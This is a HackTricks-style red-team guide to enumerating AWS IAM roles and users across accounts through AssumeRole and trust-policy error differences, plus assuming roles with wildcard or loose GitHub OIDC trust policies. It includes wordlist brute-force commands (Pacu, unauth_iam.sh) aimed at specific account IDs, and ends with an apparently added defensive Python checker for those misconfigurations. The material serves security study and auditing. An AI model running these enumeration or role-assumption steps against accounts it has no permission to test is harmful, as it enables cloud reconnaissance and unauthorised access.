AWS - IAM & STS Unauthenticated Enum

Reading time: 6 minutes

tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Enumerate Roles & Usernames in an account

Brute-Force Assuming Roles

caution

This technique no longer works: whether the role exists or not, you always get this error:

An error occurred (AccessDenied) when calling the AssumeRole operation: User: arn:aws:iam::947247140022:user/testenv is not authorized to perform: sts:AssumeRole on resource: arn:aws:iam::429217632764:role/account-balanceasdas

You can test this by running:

aws sts assume-role --role-arn arn:aws:iam::412345678909:role/superadmin --role-session-name s3-access-example

Attempting to assume a role without the required permissions results in an error message from AWS. For example, if you lack permissions, AWS may return:

```
An error occurred (AccessDenied) when calling the AssumeRole operation: User: arn:aws:iam::012345678901:user/MyUser is not authorized to perform: sts:AssumeRole on resource: arn:aws:iam::111111111111:role/aws-service-role/rds.amazonaws.com/AWSServiceRoleForRDS
```

This message confirms that the role exists but indicates that its assume-role (trust) policy does not allow you to assume it. Conversely, attempting to assume a non-existent role results in a different error:

```
An error occurred (AccessDenied) when calling the AssumeRole operation: Not authorized to perform sts:AssumeRole
```

Interestingly, this method of distinguishing between existing and non-existing roles works even across different AWS accounts. Using a valid AWS account ID and a targeted wordlist, one could enumerate the roles that exist in that account without hitting any restrictions.

You can use this script to enumerate potential principals by exploiting this issue.

Trust Policies: Brute-Force Cross-Account Roles and Users

Configuring or updating an IAM role's trust policy involves defining which AWS resources or services are allowed to assume that role and obtain temporary credentials. If the principal specified in the policy exists, the trust policy is saved successfully. However, if the principal cannot be found, an error is returned, indicating that an invalid principal was specified.

warning

Note that in that principal you can specify a role or a user from a different account:

  • arn:aws:iam::acc_id:role/role_name
  • arn:aws:iam::acc_id:user/user_name

This is an example policy:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::216825089941:role/Test"
      },
      "Action": "sts:AssumeRole"
    }
  ]
}
```

GUI

That is the error you will run into if you specify a role that does not exist. If the role exists, the policy is saved without any error. (The error shown is from an update, but it also works when creating the role.)

CLI

```bash
### You could also use: aws iam update-assume-role-policy
# When it works
aws iam create-role --role-name Test-Role --assume-role-policy-document file://a.json
{
  "Role": {
    "Path": "/",
    "RoleName": "Test-Role",
    "RoleId": "AROA5ZDCUJS3DVEIYOB73",
    "Arn": "arn:aws:iam::947247140022:role/Test-Role",
    "CreateDate": "2022-05-03T20:50:04Z",
    "AssumeRolePolicyDocument": {
      "Version": "2012-10-17",
      "Statement": [
        {
          "Effect": "Allow",
          "Principal": {
            "AWS": "arn:aws:iam::316584767888:role/account-balance"
          },
          "Action": [
            "sts:AssumeRole"
          ]
        }
      ]
    }
  }
}

# When it doesn't work
aws iam create-role --role-name Test-Role2 --assume-role-policy-document file://a.json
An error occurred (MalformedPolicyDocument) when calling the CreateRole operation: Invalid principal in policy: "AWS":"arn:aws:iam::316584767888:role/account-balanceefd23f2"
```

You can automate this process with https://github.com/carlospolop/aws_tools

  • bash unauth_iam.sh -t user -i 316584767888 -r TestRole -w ./unauth_wordlist.txt

Using Pacu:

  • run iam__enum_users --role-name admin --account-id 229736458923 --word-list /tmp/names.txt
  • run iam__enum_roles --role-name admin --account-id 229736458923 --word-list /tmp/names.txt
  • The admin role used in the example is a role in your own account that Pacu will assume in order to create the policies needed for the enumeration

Privesc

In the case where a role was misconfigured and allows anyone to assume it:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "*"
      },
      "Action": "sts:AssumeRole"
    }
  ]
}
```

An attacker can simply assume it.

Third-Party OIDC Federation

Imagine you managed to read a GitHub Actions workflow that accesses a role inside AWS.
This trust relationship may grant access to a role with the following trust policy:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::<acc_id>:oidc-provider/token.actions.githubusercontent.com"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
        }
      }
    }
  ]
}
```

This trust policy may look correct, but the lack of further conditions should make you distrust it.
This is because the previous role can be assumed by ANYONE from GitHub Actions! You should also restrict, in the conditions, other claims such as the organization name, repo name, environment, branch...

Another misconfiguration is to add a condition like the following:

```json
"StringLike": {
  "token.actions.githubusercontent.com:sub": "repo:org_name*:*"
}
```

Note the wildcard (*) before the colon (:). One could create an organization named, for example, org_name1 and assume the role from a GitHub Action in it.
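The three trust-policy misconfigurations described above (an `"AWS": "*"` principal, a GitHub OIDC principal with only an `aud` condition, and a `sub` pattern with a wildcard in the organization part) can be caught before deployment with a small audit check. The following is an added example written for this page, not code from HackTricks, Pacu or aws_tools; the policy documents are constructed to mirror the ones shown above.

```python
import json

GITHUB_OIDC = "token.actions.githubusercontent.com"


def audit_trust_policy(policy: dict) -> list[str]:
    """Return findings for an IAM role trust policy (constructed checks)."""
    findings = []
    for stmt in policy.get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        principal = stmt.get("Principal", {})
        if isinstance(principal, str):          # "Principal": "*" form
            principal = {"AWS": principal}
        aws = principal.get("AWS", [])
        aws = aws if isinstance(aws, list) else [aws]
        if "*" in aws:
            findings.append("ANYONE_CAN_ASSUME: Principal AWS is '*'")
        if GITHUB_OIDC not in str(principal.get("Federated", "")):
            continue
        # Collect every *:sub condition value regardless of the operator (StringEquals/StringLike).
        subs = []
        for cond in stmt.get("Condition", {}).values():
            for key, val in cond.items():
                if key.endswith(":sub"):
                    subs.extend(val if isinstance(val, list) else [val])
        if not subs:
            findings.append("GITHUB_OIDC_NO_SUB: any GitHub Actions workflow can assume this role")
        for pattern in subs:
            # sub looks like repo:<org>/<repo>:<ref>; a wildcard in <org> matches other organizations
            org = pattern.split("repo:", 1)[-1].split("/", 1)[0]
            if "*" in org:
                findings.append(f"GITHUB_OIDC_WILDCARD_ORG: '{pattern}' also matches other orgs")
    return findings


# Constructed sample policies mirroring the ones discussed on this page.
OPEN_ROLE = json.loads('{"Version":"2012-10-17","Statement":[{"Effect":"Allow",'
                       '"Principal":{"AWS":"*"},"Action":"sts:AssumeRole"}]}')
_gh = {"Federated": "arn:aws:iam::123456789012:oidc-provider/" + GITHUB_OIDC}
GITHUB_AUD_ONLY = {"Statement": [{"Effect": "Allow", "Principal": _gh,
                   "Action": "sts:AssumeRoleWithWebIdentity",
                   "Condition": {"StringEquals": {GITHUB_OIDC + ":aud": "sts.amazonaws.com"}}}]}
GITHUB_WILDCARD_ORG = {"Statement": [{"Effect": "Allow", "Principal": _gh,
                       "Action": "sts:AssumeRoleWithWebIdentity",
                       "Condition": {"StringLike": {GITHUB_OIDC + ":sub": "repo:org_name*:*"}}}]}
GITHUB_GOOD = {"Statement": [{"Effect": "Allow", "Principal": _gh,
               "Action": "sts:AssumeRoleWithWebIdentity",
               "Condition": {"StringEquals": {GITHUB_OIDC + ":aud": "sts.amazonaws.com"},
                             "StringLike": {GITHUB_OIDC + ":sub": "repo:org_name/app:ref:refs/heads/main"}}}]}
```

Running `audit_trust_policy` over each role's `AssumeRolePolicyDocument` (for example from `aws iam list-roles`) turns the review described above into a repeatable check.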
